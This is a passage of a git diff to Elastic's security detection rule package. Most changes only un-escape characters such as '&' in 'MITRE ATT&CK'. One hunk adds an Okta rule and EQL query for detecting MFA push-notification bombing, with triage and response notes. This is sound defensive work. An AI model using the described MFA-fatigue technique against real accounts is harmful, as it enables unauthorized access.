@@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_102.json b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_102.json index cb54a28613c..8bdab52a612 100644 --- a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_103.json b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_103.json index 63672ca7e91..a75848da106 100644 --- a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_103.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_104.json b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_104.json index 21425394e18..5b4a3fca538 100644 --- a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_105.json b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_105.json index 89c7ecaf766..5c5f4c11f83 100644 --- a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_105.json +++ b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_105.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_1.json b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_1.json index 799c8b149f3..e91af52a5cc 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_1.json +++ b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_1.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_2.json b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_2.json index fe1d887f7c8..2dc8fba4fb9 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_2.json +++ b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_2.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_3.json b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_3.json index 9088e9933ef..86b17c4c93b 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_3.json +++ b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_3.json @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_4.json b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_4.json index 515f22170cf..187cc522f88 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_4.json +++ b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_4.json @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_1.json index 7ab5d9f0381..d1d23996265 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_2.json b/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_2.json new file mode 100644 index 00000000000..3961a32e386 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_2.json @@ -0,0 +1,82 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when an attacker abuses the Multi-Factor authentication mechanism by repeatedly issuing login requests until the user eventually accepts the Okta push notification. An adversary may attempt to bypass the Okta MFA policies configured for an organization to obtain unauthorized access.", + "event_category_override": "event.category", + "index": [ + "filebeat-*", + "logs-okta*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Okta MFA Bombing via Push Notifications", + "note": "## Triage and analysis\n\n### Investigating Potential Okta MFA Bombing via Push Notifications\n\nMulti-Factor Authentication (MFA) is an effective method to prevent unauthorized access. However, some adversaries may abuse the system by repeatedly sending MFA push notifications until the user unwittingly approves the access.\n\nThis rule detects when a user denies MFA Okta Verify push notifications twice, followed by a successful authentication event within a 10-minute window. This sequence could indicate an adversary's attempt to bypass the Okta MFA policy.\n\n#### Possible investigation steps:\n\n- Identify the user who received the MFA notifications by reviewing the `user.email` field.\n- Identify the time, source IP, and geographical location of the MFA requests and the subsequent successful login.\n- Review the `event.action` field to understand the nature of the events. It should include two `user.mfa.okta_verify.deny_push` actions and one `user.authentication.sso` action.\n- Ask the user if they remember receiving the MFA notifications and subsequently logging into their account.\n- Check if the MFA requests and the successful login occurred during the user's regular activity hours.\n- Look for any other suspicious activity on the account around the same time.\n- Identify whether the same pattern is repeated for other users in your organization. Multiple users receiving push notifications simultaneously might indicate a larger attack.\n\n### False positive analysis:\n\n- Determine if the MFA push notifications were legitimate. Sometimes, users accidentally trigger MFA requests or deny them unintentionally and later approve them.\n- Check if there are known issues with the MFA system causing false denials.\n\n### Response and remediation:\n\n- If unauthorized access is confirmed, initiate your incident response process.\n- Alert the user and your IT department immediately.\n- If possible, isolate the user's account until the issue is resolved.\n- Investigate the source of the unauthorized access.\n- If the account was accessed by an unauthorized party, determine the actions they took after logging in.\n- Consider enhancing your MFA policy to prevent such incidents in the future.\n- Encourage users to report any unexpected MFA notifications immediately.\n- Review and update your incident response plans and security policies based on the findings from the incident.\n", + "query": "sequence by okta.actor.id with maxspan=10m\n [authentication where event.dataset == \"okta.system\"\n and okta.event_type == \"user.mfa.okta_verify.deny_push\"] with runs=5\n until [authentication where event.dataset == \"okta.system\"\n and (okta.event_type: (\n \"user.authentication.sso\",\n \"user.authentication.auth_via_mfa\",\n \"user.authentication.verify\",\n \"user.session.start\") and okta.outcome.result == \"SUCCESS\")]\n", + "references": [ + "https://www.mandiant.com/resources/russian-targeting-gov-business", + "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", + "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", + "https://www.rezonate.io/blog/okta-logs-decoded-unveiling-identity-threats-through-threat-hunting/" + ], + "related_integrations": [ + { + "package": "okta", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.actor.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.event_type", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.outcome.result", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "8a0fbd26-867f-11ee-947c-f661ea17fbcd", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n", + "severity": "high", + "tags": [ + "Use Case: Identity and Access Audit", + "Tactic: Credential Access", + "Data Source: Okta" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1621", + "name": "Multi-Factor Authentication Request Generation", + "reference": "https://attack.mitre.org/techniques/T1621/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "8a0fbd26-867f-11ee-947c-f661ea17fbcd_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_101.json b/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_101.json index b2ecf1fc7c7..3e33e7d87dc 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_101.json +++ b/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_101.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -50,7 +50,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_102.json b/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_102.json index 0d5f9759e7d..fef6e4c184f 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_102.json @@ -27,7 +27,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -49,7 +49,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_103.json b/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_103.json index d4cd8b02e1c..499aaa66245 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8a1b0278-0f9a-487d-96bd-d4833298e87a_103.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -50,7 +50,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_102.json b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_102.json index 3c7f66c90e1..72cd381c356 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_102.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "8a1d4831-3ce6-4859-9891-28931fa6101d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_103.json b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_103.json index d7e03c66d24..b38ab0fbcc2 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_103.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "8a1d4831-3ce6-4859-9891-28931fa6101d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -105,7 +105,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_104.json b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_104.json index c0c4222900e..d21be27df20 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_104.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "8a1d4831-3ce6-4859-9891-28931fa6101d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_105.json b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_105.json index d454178adf1..8207c21451d 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_105.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "8a1d4831-3ce6-4859-9891-28931fa6101d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -107,7 +107,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_106.json b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_106.json index 3100dc29fcd..fef6704c195 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_106.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "8a1d4831-3ce6-4859-9891-28931fa6101d", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_102.json b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_102.json index 23ad6fd3628..e6e6693e1ec 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_102.json +++ b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_103.json b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_103.json index 163f111530c..ab1c54ff8e1 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_103.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_104.json b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_104.json index c8f51afcf83..b1ec39b4790 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_104.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_105.json b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_105.json index c94da23e68b..4f0baa6dd51 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_105.json +++ b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_105.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_206.json b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_206.json index 0598116ce4e..eaeb2b19e61 100644 --- a/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_206.json +++ b/packages/security_detection_engine/kibana/security_rule/8a5c1e5f-ad63-481e-b53a-ef959230f7f1_206.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_103.json b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_103.json index bf510cc8096..0a463eb8e7e 100644 --- a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_103.json @@ -46,7 +46,7 @@ ], "risk_score": 47, "rule_id": "8acb7614-1d92-4359-bfcf-478b6d9de150", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_104.json b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_104.json index e064e930388..53e9d7dc511 100644 --- a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_104.json @@ -46,7 +46,7 @@ ], "risk_score": 47, "rule_id": "8acb7614-1d92-4359-bfcf-478b6d9de150", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_105.json b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_105.json index 0f93db731d1..896500f2288 100644 --- a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_105.json +++ b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_105.json @@ -46,7 +46,7 @@ ], "risk_score": 47, "rule_id": "8acb7614-1d92-4359-bfcf-478b6d9de150", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_205.json b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_205.json index fa01f94bec0..becd03df016 100644 --- a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_205.json +++ b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_205.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "8acb7614-1d92-4359-bfcf-478b6d9de150", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_206.json b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_206.json index 8361efc491b..703fc128ecb 100644 --- a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_206.json +++ b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_206.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "8acb7614-1d92-4359-bfcf-478b6d9de150", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to 